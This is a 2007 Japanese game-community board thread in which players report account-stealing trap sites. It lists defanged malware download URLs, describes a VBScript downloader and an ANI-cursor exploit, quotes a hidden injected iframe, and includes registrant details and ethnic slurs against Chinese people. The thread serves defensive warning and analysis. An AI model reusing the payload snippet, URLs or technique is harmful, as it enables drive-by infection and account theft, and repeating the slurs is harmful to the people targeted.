276 名前:(^ー^*)ノ〜さん :07/03/27 20:48 ID:GxYWZbchO
垢共有ですか^^;
真っ黒ギルドとして通報しますね^^;;;;;

277 名前:(^ー^*)ノ〜さん :07/03/27 21:22 ID:UMXKAAdV0
>>276
スーパーハカー様

そのギルドも特定してくださいね^^;

278 名前:(^ー^*)ノ〜さん :07/03/28 01:27 ID:gauOsDMx0
G倉庫で120Mとか少なすぎるでしょ^^

279 名前:(^ー^*)ノ〜さん :07/03/28 01:31 ID:qIJPZniA0
>>275-279
俺も含めてまとめて雑談スレ行けや

280 名前:(^ー^*)ノ〜さん :07/03/28 05:28 ID:hsku5JeF0
【  アドレス   】 http://64■233■179■104/
【気付いた日時】 踏んだ日にちは3/27
【     OS    】 windows XP
【使用ブラウザ 】 IE6.0?
【WindowsUpdateの有無】三日ほど前
【 アンチウイルスソフト 】 なし
【その他のSecurty対策 】 わかりません
【 ウイルススキャン結果】 これから無料のオンラインスキャンをしてみます
【スレログやテンプレを読んだか】 YES

ブログのアクセス解析にあったアドレスなのですが、見たこともないアドレスで不安です。
一応YAHOOあたりでアドレス丸ごと検索かけてみたのですが、グーグルが出てきたり
韓国語のページが出てきたりしました。垢ハックアドレスの類じゃなければいいのですが…
一体何なのかよくわかりません。有害なアドレスなのでしょうか。

281 名前:(^ー^*)ノ〜さん :07/03/28 07:43 ID:B9GLjkXs0
>>280
Googleが所有しているIP
よって問題ない

282 名前:(^ー^*)ノ〜さん :07/03/28 09:30 ID:qIJPZniA0
>>280
Googleのロボットが巡回した結果残された足跡なんじゃないかな。
垢ハックじゃないので、「今回の投稿分については」気にする必要は無い。

283 名前:(^ー^*)ノ〜さん :07/03/28 11:08 ID:jq2gXYad0
でもまぁそのくらい警戒するのは良い事だ。

284 名前:(^ー^*)ノ〜さん :07/03/28 12:25 ID:XjdHcj3G0
【  アドレス   】http://whois■domaintools■com/rom776■com
【気付いた日時】 3月28日
【     OS    】 windows XP Home Edition
【使用ブラウザ 】 (IE6)
【WindowsUpdateの有無】 1週間位前。
【 アンチウイルスソフト 】 ウイルスバスター2006
【その他のSecurty対策 】 ?
【 ウイルススキャン結果】 現在進行中
【スレログやテンプレを読んだか】Yes
【説明】
過去にも出てきている776の偽り?ページを踏んでしまいました。
やはりまだ被害詳細は不明なのでしょうか?
このサイトはまだ被害者はでていないのでしょうかね?心配です。

285 名前:280 :07/03/28 13:15 ID:pNT8QVTc0
280です
特に心配無いようですね。最近垢ハック露店が出回ってるので滅茶苦茶警戒してました。
皆様もお気をつけて…
ありがとうございました〜

286 名前:(^ー^*)ノ〜さん :07/03/28 13:31 ID:zs/XWymN0
>284
domaintoolsのを踏んだのか、それが無いのを踏んだのか。

無印の場合、今も怪しいまま。
domaintools付きの場合は>36-40参照。

287 名前:284 :07/03/28 13:49 ID:XjdHcj3G0
確かにHP内にはdomaintoolsって文字と英文字がいっぱい書かれていました。

domaintools付きでも怪しいかも?ってところですか?

288 名前:(^ー^*)ノ〜さん :07/03/28 14:42 ID:Z1jWfjJF0
まあ>>280くらい滅茶苦茶警戒するくらいでちょうどいいよ。

289 名前:(^ー^*)ノ〜さん :07/03/28 15:21 ID:okbop0ib0
>>284
無害だとサイト上で主張している通り、現在のところ特に害はありません。
JavaScriptは ブレイナー社 ( http://brainer.jp/ )のコンテンツ
マッチ広告を表示するもの。

# R.O.M 776を宣伝するサイトと言っておきながら、その表記が
# いい加減だったりするあたりがなんとも。

| 本当は、ちょっと色々と調べるためのページです。
飽きてから何に化けるかわかりませんので、要注意扱いなのは
かわりませんね。

290 名前:(^ー^*)ノ〜さん :07/03/28 16:11 ID:uU44Aqr80
>287
簡単に書けば
whois■domaintools■com/rom776■com → 安全なページ
rom776■com → 要注意なページ

>39にあるように、domaintoolsはドメイン情報を表示してるサイト。
広告その他も多いが、基本はwhoisの情報を表示してるだけ。
whois情報ってのは>173>270のようにドメインを取得した人が登録している
内容の事。

つまり>284のアドレスは、rom776■comのドメインを取得した人の情報を
表示してるだけで、何も問題は無い。

怪しいと言われてるのは rom776■com の方で、今のところ無害ではあるが
本家rom776の管理人氏も無関係であると明言してるし、今後どうなるかは不明。

291 名前:(^ー^*)ノ〜さん :07/03/28 21:37 ID:2VWMOIzX0
すいません、ちょっと気になったので質問なのですが
先ほどライブドアHPにてブログ一覧から人気のページ、ブログをクリックしてみたら
意味不明な内容だったり、真っ白なページだったり・・・

これは偽ページとかじゃないですよね・・・・?

開いたページ
http■//www■livedoor■com/blog

見たのは
■よく眠るために覚えておきたい17のTips
■無料で使える大きめアイコン素材集 10サイト
です。

292 名前:(^ー^*)ノ〜さん :07/03/28 21:49 ID:GI08W/La0
>>291
>>1
※ このスレは『勇気が無くて見れないサイト解説スレ』ではありません

293 名前:(^ー^*)ノ〜さん :07/03/28 21:50 ID:qIJPZniA0
>>291
移動よろ

>>1
>重要な情報が埋れてしまわないようにする為、一般的なセキュリティ
>対策・相談・雑談は>>2に有る雑談スレを利用して下さい。
>
>※ このスレは『勇気が無くて見れないサイト解説スレ』ではありません

294 名前:(^ー^*)ノ〜さん :07/03/28 22:01 ID:SVg+OU6f0
自分のblog(FC2)のコメントに、にアカウントハックアドレスが書かれたので報告に。
すでにまとめサイトに記載されているアドレスではありますが…

------------
投稿者名:ふしのん
書き込み:2007/03/28(水) 10:40
IP:210.16.230.91

本文
訪問及び足跡並びにコメントおおきに
はじめまして。ご訪問ありがとうございます。(*^v^*)
URL : ttp://www■kuronowish■net/links/lineage■htm
------------

しかし、アカウントハックについての記事にこのコメントするあたりが何とも。

295 名前:291 :07/03/28 22:54 ID:2VWMOIzX0
失敬しました。あちらで聞いてみます。

296 名前:(^ー^*)ノ〜さん :07/03/29 09:20 ID:goN17QKJ0
>>294

inetnum: 210.16.192.0 - 210.16.255.255
netname: HANINTERNET
descr: HANINTERNET
country: KR

恐らく踏み台かPC房。

297 名前:(^ー^*)ノ〜さん :07/03/29 18:14 ID:nN7I8ByO0
BSスレの545に>>262が張られてた。いま消されたけどMMOBBSにも進出ですか。

298 名前:(^ー^*)ノ〜さん :07/03/29 18:16 ID:nN7I8ByO0
545 名前:Wiki & ◆F828YQn8a2[] 投稿日:07/03/29(木) 17:41 ID:Ax7xwX9F0
DKとかにイレースかけてTUとかできた人いる?
堕落はできるみたいですね@@
↓の人のブログ参照
ttp://www■blog-livedoor■net/game/   



一応こぴぺ。ピリオドを置換。

299 名前:(^ー^*)ノ〜さん :07/03/29 18:38 ID:dUct+BCF0
数日更新サボってたら貼られてしまった
今まで既出のものは弾いてただけでwiki程ではないですが来てました

300 名前: ◆sp4Sh9QXGI :07/03/29 18:55 ID:aV0/UE450
雑談>>478より
> リネージュ資料室さまの「セキュリティ対策」の「危険サイト」および「危険ドメイン」に2つ追加されています。
> ・www■gsisdokf■net
> ・www■18girl-av■com
> どちらも中華のようです。ドメイン情報を調べられる方、本スレへの転載をお願いします。

いつもの烏龍茶の国からこんにちは、ですね。
後者はどうにもエロ系サイト偽装のようですが。
IPが222■214■216■73 は未出っぽいのでPG2リストに追加しておきます。

301 名前: ◆sp4Sh9QXGI :07/03/29 19:07 ID:aV0/UE450
というわけで更新しました。

が、改めてnslookupに引っ掛けたところIPはjprmthome系のアレでした。
aguse.netで調べたら出てきたIPは何だったのか!

302 名前:(^ー^*)ノ〜さん :07/03/29 19:55 ID:hxgcuBFI0
登録情報調べてみました
毎度おなじみ福建人じゃないですか!
郵便番号を竜岩市の364000から成都市の610000に変えてますね。
出鱈目なら何処でも良いだろうものだがわざわざ四川省成都を書き込むんだろう?
ひょっとして成都に連中の支部がある可能性も。


こっちなら誰でも簡単に調べられるからお勧め。
ttp://whois■ansi■co■jp/

上ので調べてこの登録情報にピンと来たらアカハック
多少変えている(変装している)ことがあります。

gsisdokf■net
18girl-av■com

共通情報
Registrant Name ................. zhiqiang lin
Registrant Organization ......... zhiqiang lin
Registrant Address .............. fujian longyan (福建省竜岩市)
Registrant City ................. longyan
Registrant Province/State ....... fujian
Registrant Postal Code .......... 610000 (四川省成都市の番号に変装)
Registrant Country Code ......... CN

303 名前:(^ー^*)ノ〜さん :07/03/29 20:25 ID:WKemy9bK0
垢ハックは許せません。
法律では他人のアカウントで不正にサーバへアクセスしたことによる不正アクセス禁止法違反
他人のPCにウィルスを入れたことによる器物損壊罪
になるはず

BOTは、運営者が禁止しているちょっとゆるせないかな?すむからBOTくらいなら許しますが
垢ハックは他人の財産を奪う最低なことです私は昔BOTerでしたが、垢ハックをする中華が許せません。

304 名前:(^ー^*)ノ〜さん :07/03/29 20:33 ID:YMVHnDB40
目くそ鼻くそを笑う

305 名前:294 :07/03/29 21:14 ID:UyW4HyHM0
>>294 です。
サイトのアクセス解析にも先日報告したIPが引っかかっていたので、こちらも記載しておきます。

------------
2007/03/28 10:33:51
ページ回数1 サイト回数1 前回? 初回?
モニタ:1024 x 768 x 32bit JavaScript:True Cookie:True
HTTP_REFERER:Favor's Ragnarokさん(アドは省略)
HTTP_USER_AGENT:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
国/言語:中国語
REMOTE_HOST:210.16.230.91
------------

306 名前:(^ー^*)ノ〜さん :07/03/29 21:16 ID:a4PAjiWH0
>>303
BOTも正規クライアントを通さず、不正な方法で接続するので不正アクセス
禁止法違反にあたるってこと理解してるか?
結局、自分がセコセコBOTで稼いでるのを尻目に、シナが全財産を一気に
かっぱいでるのにお咎めなしってのが気に食わないだけだろ。

307 名前:(^ー^*)ノ〜さん :07/03/29 21:20 ID:0LJTY7L70
とあるROの情報サイトを管理してるんですけど、
つい先日連絡用に設置したweb拍手のコメントに
http://www■biglobe-ne■com/bbs/のアドレスがはられてました。
誘導するようなコメントも貼ってあったのでそういうとこからも
踏まないように気をつけたほうがよさそうですね。

308 名前:(^ー^*)ノ〜さん :07/03/30 03:50 ID:DbG8w2KE0
>>306
もしそうだとしても、BOTはまぁ、いけないことだなぁ
でもアカハックは他人の財産(ゲーム内のアイテムや、PCのデータなど)を奪う悪質な段階となっており
BOT以上に許せないのは確か

BOTは自動に狩、ずるい、ゲームバランス崩れるだけど垢ハックは
正規のプレイヤーだろうと、チーターだろうと
初心者だろうと、中華だろうと無差別に見境なく
ゲームの中の大金といえるアイテムやお金をゴッソリもってかれるのですよ

309 名前:(^ー^*)ノ〜さん :07/03/30 04:00 ID:qfuYKkqF0
通貨偽造と窃盗はどっちが悪いとか言ってる様なものなので、その話はもうやめよう。

310 名前:(^ー^*)ノ〜さん :07/03/30 04:14 ID:ZgjodrHg0
垢ハクの目的って
アイテム奪って→売ってZenyに→RMTで現金化
だろ
だから、どこぞの管理社みたくRMTを潰しまくれば減ると思うんだ
RMT狙いのBOTも減って一石二鳥じゃないか!


何が言いたいかって言うと
癌チネ

311 名前:(^ー^*)ノ〜さん :07/03/30 05:28 ID:J6S+jc630
>>1
>対策・相談・雑談は>>2に有る雑談スレを利用して下さい。

312 名前:(^ー^*)ノ〜さん :07/03/30 12:31 ID:7l48I5TT0
>>300
>IPが222■214■216■73 は未出っぽいのでPG2リストに追加しておきます。
そのIPは中国四川省(SC)ですね、CHINANET-SC。
302のような登録情報を使うことから
やっぱり支部のようなものが四川省、恐らく成都にあるものと。
書き込まれなくとも四川省IPがログにあったら気をつけた方がいいと思う。

313 名前:(^ー^*)ノ〜さん :07/03/30 17:04 ID:CiTnYlf20
http://www■interzq■com/bbs

http://www■din-or■com/bbs

というリンクが自分のページに書き込まれてました。
一度踏んでしまい、ウィルスチェック(AVG)が検知したのですが・・・少し心配。

同じIPだったのでROのハックサイトへのページなんですね。

314 名前:(^ー^*)ノ〜さん :07/03/30 18:25 ID:iVujIkBg0
ですね。既出で

315 名前:(^ー^*)ノ〜さん :07/03/30 19:14 ID:V1AFDcdv0
テレポやハエはおろか蝶すら使えないMAPというのはありますか?
BOTを隔離したいのですが。

316 名前:(^ー^*)ノ〜さん :07/03/30 19:24 ID:tG4Rxvhd0
基本的に蝶が使えないMAPというのはない。
入ると強制セーブされてポタも取れ、ハエは使えないというBOT隔離に
最適なアサギルドは癌によって潰された。
ただ、よく闇ポタで送られて止まってるのはリヒ宿屋とかで見るな。
古いMAPデータしか持ってないBOTには有効なのかね。

317 名前:(^ー^*)ノ〜さん :07/03/30 19:44 ID:fIxxtr+C0
それ以前に完全なスレ違い。

318 名前:(^ー^*)ノ〜さん :07/03/30 21:12 ID:J6S+jc630
>>315
マルチは去ね

319 名前:(^ー^*)ノ〜さん :07/03/30 21:26 ID:7l48I5TT0
リネージュ資料室にて以下が登場
上はなんちゃってFF系掲示板、下はなんちゃって2ちゃん?
(6と2の間にドットを入れればそんな感じ)
www■ffxiforums■net
www■game62chjp■net

登録情報は下は302と同じ登録情報なので省略。
上はメンバーと思しき情報につき掲載。

Domain Name:ffxiforums■net
Registrant:
Zhang xiaolong
shang hai guangzhong road 328
200000

Administrative Contact:
Li hoy
Zhang xiaolong
shang hai guangzhong road 328
Shanghai Shanghai 200000
CN

320 名前:(^ー^*)ノ〜さん :07/03/31 18:14 ID:KNmTey+i0
新ドメインを確認、登録情報からして罠利用は確実だ。
302と同じ登録情報。

lovejpjp■com

Domain Name ..................... lovejpjp■com

Registrant Name ................. zhiqiang lin
Registrant Organization ......... zhiqiang lin
Registrant Address .............. fujian longyan
Registrant City ................. longyan
Registrant Province/State ....... fujian
Registrant Postal Code .......... 610000
Registrant Country Code ......... CN

321 名前:(^ー^*)ノ〜さん :07/03/31 18:17 ID:CCR2tXmq0
初かきこです

www.geocitylinks■com/
219■102■176■65
ブログで

「あしあと、カキコミありがとう」
ってコメントが書いてあった。
情報系だったら解るがこう言う垢ハクヒドス

カキコミ下覚えねーなーと思いつつ踏んでしまった。
一応バスターとカスペルでやりはしたが
カスペルの方でトロイ系のダウンローダー。大丈夫なのか心配・・・。

322 名前:(^ー^*)ノ〜さん :07/03/31 18:33 ID:KNmTey+i0
>>321
ダウンローダー検出したなら大丈夫なわけはない。
実行されていなかろうが早急に駆除しないといけないね。
駆除方法などは検索するなりして見つけてくださいね。

それとそのホストはプロキシかな、もしくは協力者をネカフェに入り込ませたかの
どっちかと思われる。
国内にも留学生と言う名の協力者がいるしね。

321のIP、東京の端末。
pl065■nas927■p-tokyo■nttpc■ne■jp

ISPに苦情を入れればいいと思うよ、返答でどっちか分かる。
不特定多数が〜と言う返答だったら大体ネカフェ。
ブログのURLと記事のコピペ、IPか上のリモートホストを書いておかないとダメだからね。
【このIPの苦情先】
abuse@sphere.ad.jp

323 名前:(^ー^*)ノ〜さん :07/03/31 18:43 ID:CCR2tXmq0
321です
ありがとうございます。早速試してみます
。・゚・(ノ∀`)・゚・。
本当助かりました

324 名前:(^ー^*)ノ〜さん :07/03/31 19:34 ID:50UY8b450
最近、新宿・池袋・西川口周辺に韓国・中国系ネットカフェが
(露骨に中国語か韓国語の看板)ネットゲームできるという
触れ込みで看板を出して営業している

こういうところだと一般ISPを利用してる場合が多い。
地域ISPなんだけど顧客にいるんだよ・・・
ISPだけで既に判断つきにくいかもしれない 。・゚・(ノ∀`)・゚・。

325 名前:(^ー^*)ノ〜さん :07/03/31 21:46 ID:6dEOAI7l0
--------------------------------------------------------
Ro 装備. 血盟すれっど
陽光RO会社 URL: http■//www■aaa-livedoor■net/ro-navi/
Ro 公式ページRo 狩場 Ro 武器、防具製作.
者Ro 攻略
◆Gunho-Online-Entertainment内部告発◆
>記事全文まとめ。
http■//www■ro-bot■net/10657/
>雑誌記事の取り込み画像
http■//www■gemnnammobbs■com
--------------------------------------------------------

↑複数のWikiに今日、新ページ作成か既存ページの改竄でコレが
貼られてるんでWiki利用者は注意ね。

326 名前:(^ー^*)ノ〜さん :07/04/01 04:52 ID:Pnpsf3Kf0
むしろネットカフェのほうを晒したほうがいいんでね…いやまじで。
そういうのができるのが匿名掲示板の強みだとも思う。

327 名前:(^ー^*)ノ〜さん :07/04/01 06:00 ID:TDxaNNWn0
俺の行くネットカフェの定員さん可愛いぞ

328 名前:(^ー^*)ノ〜さん :07/04/01 11:43 ID:06aQ3B7e0
kwsk

329 名前:(^ー^*)ノ〜さん :07/04/01 18:52 ID:gKkOD5y30
わしのネットカフェは5時間980円だ

330 名前:(^ー^*)ノ〜さん :07/04/01 21:14 ID:Mag2iSix0
>>325
3/20ぐらいに、リネで危険URL登録されてたHPだね。
先日、知らずに火狐で2回踏んじゃったんだけど(青画面)、今に至っても変化なし。
リネで存在が確認されてから10日以上経過してるし、カスペル先生も対応してるかなと思ったら反応無し。
URLをgoogleで検索するとタイトルが「良いっすね」。

ちなみに、俺が踏んだ時の文が鯖別の雑談板だった。
踏んでからは、PeerGuardian2を搭載したけどね。

331 名前:(^ー^*)ノ〜さん :07/04/02 01:53 ID:VD+JmgtH0
>>330
ソースチェッカーで調べてみたけど>>325のは3つとも同じ手口だね。
VBScriptでウイルス本体と思われるEXEファイル(↓)をダウンロードして実行するというもの
VBScriptが動かない環境(Firefoxなど)なら、とりあえず大丈夫だね。
今後中身が変化する可能性もあるから、油断は禁物だけど。

http://www■ro-bot■net/ro-navi/yan■exe (http■//www■aaa-livedoor■net/ro-navi/)
http://www■ro-bot■net/10657/yan■exe (http■//www■ro-bot■net/10657/)
http://www■jprmthome■com/yan■exe (http■//www■gemnnammobbs■com)

実際にダウンロードしてないから分からないけど、同じファイル名だし中身同じなのかなあ。

332 名前:(^ー^*)ノ〜さん :07/04/02 05:35 ID:8/5GViwP0
普通アカウントハックなんかされねえよ

お前ら相当あほなんだなww

333 名前:(^ー^*)ノ〜さん :07/04/02 05:44 ID:blIV4VOd0
はいそうっすね

Windows狙うゼロデイ攻撃拡大の様相、被害防止の非公式パッチも
ttp://www.itmedia.co.jp/enterprise/articles/0703/31/news011.html

これの公式パッチはまだだろうか・・・

334 名前:(^ー^*)ノ〜さん :07/04/02 07:46 ID:6v9lj5000
>>331
検体入手してみるかと思ってダウンロード試みたが、その3ファイル、全部「ページがみつかりません」。

既に移動済みなのか、未設定なのか不明。

335 名前:(^ー^*)ノ〜さん :07/04/02 09:27 ID:BUid1IvGO
うちの近所のネカフェは癌公式店のくせに
ウイルス対策ソフトすら入って無いぜ

336 名前:(^ー^*)ノ〜さん :07/04/02 10:11 ID:z8FsFrkg0
>>331
サイズ: 48612バイト
MD5: f579f7a5cc4d16ea1d640f1f7944e75d
バスター2007: TSPY_MARAN.D
で3つとも一致。

>>334
iframe src="http://"〜
という記述があって、それが無効な構文エラーを引き起こしているようで。
もちろんアカハックの罠はその裏で…

もしくは経路が悪いのかサーバが悪いのか、通信が非常に遅くて(当方で数百バイト/s)、
それでタイムアウトしたのかもしれない。

337 名前:(^ー^*)ノ〜さん :07/04/02 10:23 ID:O/OSYKpq0
もう報告上がっちゃいましたか・・・

>>331
1CD Linuxで検体ダウンロード。MD5が一致したから、3つは完全に同じファイルだった。
virustotalで各アンチウイルスソフトの対応をチェックした結果↓
ttp://www.virustotal.com/vt/en/resultadof?5d46910dc6be475bb3280af8d5e7dccd

>>334
基本的な問題で、hostsやPG2あたりでブロックしてたとか・・・
うちもWindowsで検体落とそうとすると、その辺をまず解除しなきゃいけなくて・・・
あと、誤爆クリックで実行したら怖いから、やっぱりこういうときは非Win環境が安心。

338 名前:(^ー^*)ノ〜さん :07/04/02 10:57 ID:INN++zfe0
こんなリンクがあったので調べると案の定毎度おなじみ福建人のもの。
www■kotonohax■com/blog/nc■htm

暗号化されたスクリプトから以下が呼び出される。
4月2日10時現在でカスペルスキー未検出、注意!
www■kotonohax■com/blog/xzz■exe


登録情報からしていつもの福建人組織で間違いはないだろう。
Domain Name:kotonohax.com
Registrant:
ling bao
lyzsl
364000
Administrative Contact:
lingbao
ling bao
lyzsl
ly Fujian 364000
CN

339 名前:(^ー^*)ノ〜さん :07/04/02 13:47 ID:INN++zfe0
338のxzz■exeをVirusTotalでスキャンすると反応したのは以下だけと言うお寒い状況。

4月2日13時40分時点で反応したもの
BitDefender 7.2 04.02.2007 Backdoor.Agobot.39
eSafe 7.0.15.0 04.01.2007 Suspicious Trojan/Worm
Ikarus T3.1.1.3 04.02.2007 Trojan-Dropper.Win32.Agent.ano
Webwasher-Gateway 6.0.1 04.02.2007 Win32.Malware.gen#ASPack (suspicious)
Fortinet 2.85.0.0 04.02.2007 suspicious
Panda 9.0.0.4 04.01.2007 Suspicious file

340 名前:(^ー^*)ノ〜さん :07/04/02 14:35 ID:O/OSYKpq0
337のリンクはすでに見れなくなってますね。
338のも含めてMMOBBSのアップローダに上げておきました。
ttp://www.mmobbs.com/uploader/files/2388.zip

338もEXEファイルダウンロード〜実行までの手口は331と全く同じです。
(先日調べた限りは、lovetwやinterzqなども同じ手口です↓)

VBScriptまたはJScriptでMicrosoft.XMLHTTPおよびAdodb.Streamという
2つのActiveXコントロールを生成する方法が多くの罠サイトで見受けられますので、
・VBScriptおよびJScriptをOFFにすること (IE系ブラウザを使わないのが無難)
・Windows Updateを行うことにより、上記2つのActiveXコントロールの脆弱性をなくすこと
が効果的な対策になると思われます。

341 名前:(^ー^*)ノ〜さん :07/04/02 15:40 ID:8u+1mCXp0
嫌なパターンが。

| 神器材料買取 ひっとん 【2007/04/02 13:18:39】 HomePage [返信] [削除]
|
| 神器材料買取してます、何かあればお声をおかけください。
| 白ポ?青ポ?白スリム?塩酸?火炎瓶は販売の他、材料との交換も行ってます。
| 販売価格及び交換比率は各自お問い合わせください。
| その他応相談 ※身内特典あり(詳しくは本人まで)
| http://csfir.blog87.fc2■com/

URLは本物の fc2ブログだが、ソースを見ると </body>直前に lovetwが埋まってる。
二日分しかないあたり、どこかのblogをコピった偽者か。

<iframe src="http://www.lovetw.webnow■biz/2jp" width="0" height="0" frameborder="0"></iframe></body>


# fc2へは一応連絡済。

342 名前:(^ー^*)ノ〜さん :07/04/02 16:03 ID:6v9lj5000
>>338-339
NOD32とF-Secure、キングソフトには検体提出してきました。
あとは提出窓口知らないので、各セキュリティソフトの使用者各自でよろしゅ。

343 名前:(^ー^*)ノ〜さん :07/04/02 16:11 ID:JhH5Bh/10
リネージュ資料室を見てて気がついたけど、短縮URLを使い始めたな。

あとアニメーションアイコン(ani)の脆弱性、
既に攻撃コード開発ツールも出回っておりトロイとして拡散中。
IE7とかでも普通にやられる。つーかやられた。

検体を送ろうと拾ったファイルの拡張子をエクスプローラでaniにした途端
実行しやがったので回線引っこ抜いた。aniを描画する過程で実行されることと、
エクスプローラはナチュラルにaniを表示するので注意(Windows\Cursorsを見よ)。

344 名前:ももカヽ :07/04/02 16:18 ID:+GNS09w2O
垢ハックにみんなまけるな!

345 名前:(^ー^*)ノ〜さん :07/04/02 16:22 ID:/sF2VlwG0
>>341
それはブログの見出しをパクってどこかに書き込んだものだね。

このフレーズを検索したらオリジナルが出た。
”神器材料買取してます、何かあればお声をおかけください。 blog”

オリジナルはライブドアブログだよ。

346 名前:(^ー^*)ノ〜さん :07/04/02 17:36 ID:idxAQEm00
”.”→”■”の全置換しようよ

347 名前:(^ー^*)ノ〜さん :07/04/02 17:43 ID:8JdisCQX0
>>341
トップレベルドメインまでリンクが入ってないから、開いても”たぶん”大丈夫だろうけど
できれば ドット は全て■に置換してから書き込みお願いします。

348 名前:(^ー^*)ノ〜さん :07/04/02 17:57 ID:2FkrIicP0
>>341
/2jp/a21.exe NSPack圧縮のMaran。

349 名前:(^ー^*)ノ〜さん :07/04/02 18:13 ID:2FkrIicP0
ani設置 rormb■com
rarbrc=rormb=linrmb。リネ・ROアカハックではやっぱこいつが最凶。
拡張子がjpgなaniアイコンが2匹、いずれも同じexeをドロップするダウンローダ。
なおaniだけ拾おうとしてもちょっと手間がかかる
(EncodeされたVBScriptでアニメーションカーソルCSS入りのHTMLを書く)。
その辺いじってる内に踏みかねないので、回線切るか仮想環境を推奨。
検体を拾った後のエクスプローラでの取り扱いに注意(aniに変名すると即実行される)。

350 名前:(^ー^*)ノ〜さん :07/04/02 18:29 ID:Tae9lU/80
ああ、なるほど挙動が大体わかった。
ani拡張子のファイルは中身確認せずにオープンしようとするのか。
exeをjpgなりの拡張子にしてバイナリとして落としてaniにリネームして開けば即実行ってことか。
CSS系もやばそうな気がする。

351 名前:(^ー^*)ノ〜さん :07/04/02 18:50 ID:4r2x25e60
>MS、Windows脆弱性のパッチを3日にリリース
>ttp://www.itmedia.co.jp/enterprise/articles/0704/02/news035.html

日本語版Windowsに対応するのかどうか不明だが、このパッチを当てるまでは要注意。
既知の危険サイトにしか置かれてないならhostsなりPG2なりで防げるが、未知の罠サイトだと
遣られかねない。

eEyeから非公式パッチも出てるが、そっちを当てていいものか悩む。

352 名前:(^ー^*)ノ〜さん :07/04/02 18:56 ID:2FkrIicP0
回線抜きまくりでID変わってるけど >>343 = >>349 です。
rormbは持ちドメインが少ないけど、lovetwの奴が使い出したら厄介だなぁ。
Firefoxで拾う→回線抜く→aniにする→圧縮する→ani削除→回線繋ぐ→検体送付
…やってられんわ。早くパッチ出てくれ…。

353 名前:(^ー^*)ノ〜さん :07/04/02 19:23 ID:2FkrIicP0
>>325 の www■ro-bot■net/10657/ が
aniを使うスクリプトに差し替わってる
(ヘッダを信用するなら今朝8時20分頃?)。
aniがダウンロードするのはyan.exeだけど。

スクリプトはこいつ。平文なのでメモ帳でどうぞ。
www■ro-bot■net/10657/muxiao■js
CSSでカーソルを指定しているのがわかると思う。
パッチは明後日か…。まさに0-dayだなぁ。

354 名前:(^ー^*)ノ〜さん :07/04/02 20:45 ID:GiAX1jBG0
ソースチェッカーのキャッシュを削除して調べたけど、
>>325のは完全に差し替わってるね。

ttp://www■aaa-livedoor■net/ro-navi/(罠サイト入口)
ttp://www■ro-bot■net/ro-navi/muxiao■js(JavaScript)
ttp://www■ro-bot■net/ro-navi/muxiao1■jpg(ANI?)
ttp://www■ro-bot■net/ro-navi/muxiao2■jpg(ANI?)

ttp://www■ro-bot■net/10657/(罠サイト入口)
ttp://www■ro-bot■net/10657/muxiao■js(JavaScript)
ttp://www■ro-bot■net/10657/muxiao1■jpg(ANI?)
ttp://www■ro-bot■net/10657/muxiao2■jpg(ANI?)

ttp://www■gemnnammobbs■com(罠サイト入口)
ttp://www■jprmthome■com/muxiao■js(JavaScript)
ttp://www■jprmthome■com/muxiao1■jpg(ANI?)
ttp://www■jprmthome■com/muxiao2■jpg(ANI?)

パッチが出るまではIEの使用は控えた方が良さそうですね。

355 名前:(^ー^*)ノ〜さん :07/04/02 20:55 ID:/sF2VlwG0
リネージュ資料室によるとこのドメインも現れたらしい
www■1gangmu■com
IPは219■232■224■87

www■1gangmu■com/sysexe/にsysffと言う実行ファイルがある。

VirusTotalでの結果、この時点でこれまたカスペで検知されない。
ttp://www.virustotal.com/vt/en/resultadof?bc59ef99e114f7198fa348c3cb144892

キングには検体を出した。

ドメイン登録情報、それによると黒龍江省ハルピン市と出る
Registrant:
gangmutangyaoju
haerbin 150001
china
Phone: 0451-89026868 Fax:
Domain name: 1GANGMU.COM

356 名前:(^ー^*)ノ〜さん :07/04/02 21:07 ID:2FkrIicP0
FF用っぽいね。

357 名前:(^ー^*)ノ〜さん :07/04/02 21:42 ID:2FkrIicP0
>>354
CSS切ればいいんじゃねと思ったけど、faviconでも踏む模様。
だめだこりゃ。

358 名前:(^ー^*)ノ〜さん :07/04/02 22:27 ID:Ps9OYMgx0
ちょっと聞きたいんだけど、自分のパソコンノートン入れてるんだけど、
よく勝手にスキャンが始まって、ウィルスを検知するんだ。
ちなみに↓が今日検知した内容。
「Cookie:プヂ@valueclick.ne.jp」
んで、説明に
「コンピュータの情報を第三者に送る可能性のあるファイルです」
リスクLvは低。
こんなんが何回か出てるんだ。
ちなみに今まで被害は全くない・・・。
垢ハクとは関係ないのかもしれんが・・・。
何だろう・・・。

359 名前:(^ー^*)ノ〜さん :07/04/02 22:35 ID:PJka4GzR0
それはトラッキングCookieと呼ばれる物でアカハックとは関係ないし、
セキュリティ上の危険も大きくはない。

製品Q&A(ウイルスバスター2007)
ttp://esupport.trendmicro.co.jp/supportjp/viewxml.do?ContentID=JP-2060185&id=JP-2060185
やさしいセキュリティ講座(8) トラッキングCookie
ttp://eazyfox.homelinux.org/Security/Beginner/beginner08.html

360 名前:(^ー^*)ノ〜さん :07/04/02 22:35 ID:p7MV+qRG0
>>358
トラッキングクッキーで検索するんだ

361 名前:(^ー^*)ノ〜さん :07/04/02 22:36 ID:p7MV+qRG0
やっぱりかぶったヽ(´ー`)ノ

362 名前:(^ー^*)ノ〜さん :07/04/02 22:38 ID:Ps9OYMgx0
おお、こんなに早くレスがつくとは・・・。
>>359>>360ありがとう。
なるほど、垢ハクと関係ないんだ。
なら安心しました。
ちょっとくぐって調べてみる。

363 名前:(^ー^*)ノ〜さん :07/04/02 23:01 ID:2FkrIicP0
ani補足。eEyeの非公式パッチを回避する攻撃手法が既に公開されています。
やっぱ公式パッチが出るまでだめだわ。

364 名前:(^ー^*)ノ〜さん :07/04/03 00:58 ID:nwWdgxmI0
>>362
君は、Cookie がどういうものかから、勉強することを勧める。

365 名前:(^ー^*)ノ〜さん :07/04/03 02:25 ID:5Rtg1Z+i0
>>351
>2007 年 4 月の事前通知 (定例外)
>2007 年 4 月 4 日、マイクロソフトは以下のリリースを予定しています。
>ttp://www.microsoft.com/japan/technet/security/bulletin/advance.mspx
ということで定例外の事前通知がでてます。
ITmediaの記事には3日(米国時間)にパッチリリース予定とありますので
多分同じものではないかと思われます。

366 名前:(^ー^*)ノ〜さん :07/04/03 02:44 ID:d2IOQAtH0
>>349に仕込まれてる拡張子がjpgなaniファイルについてvirustotalでチェックしてみた
ttp://rormb■com/skto/z1■jpg
ttp://rormb■com/skto/z2■jpg

ttp://www.virustotal.com/vt/en/resultadox?6eb11cbee3b2e9c7a648caf8b23adf7f
